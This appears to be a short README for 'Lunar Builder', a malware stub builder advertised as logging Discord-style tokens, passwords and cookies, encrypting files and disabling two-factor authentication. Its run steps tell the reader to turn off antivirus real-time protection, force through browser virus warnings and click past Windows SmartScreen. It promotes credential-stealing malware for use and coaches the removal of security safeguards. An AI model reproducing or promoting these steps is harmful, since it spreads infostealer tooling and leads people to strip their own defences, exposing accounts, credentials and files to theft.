Lunar Builder is a stud maker, which can token log, password log, cookie log, file encrypt, token trace, disable 2fa and more!


How to run!

STEP1: Disable real-time protection to download the file

STEP2: Download the file, if it says something like download failed due to containing a virus then click ctrl+j and you should be redirected to the downloads page of your browser. Whilst in the downloads page you can authorize the download by clicking something along the lines of 'Resume Download'.

STEP3: Run the file, if it doesnt run or you get an error like 'Windows protected your pc', then click more info and then click run anyway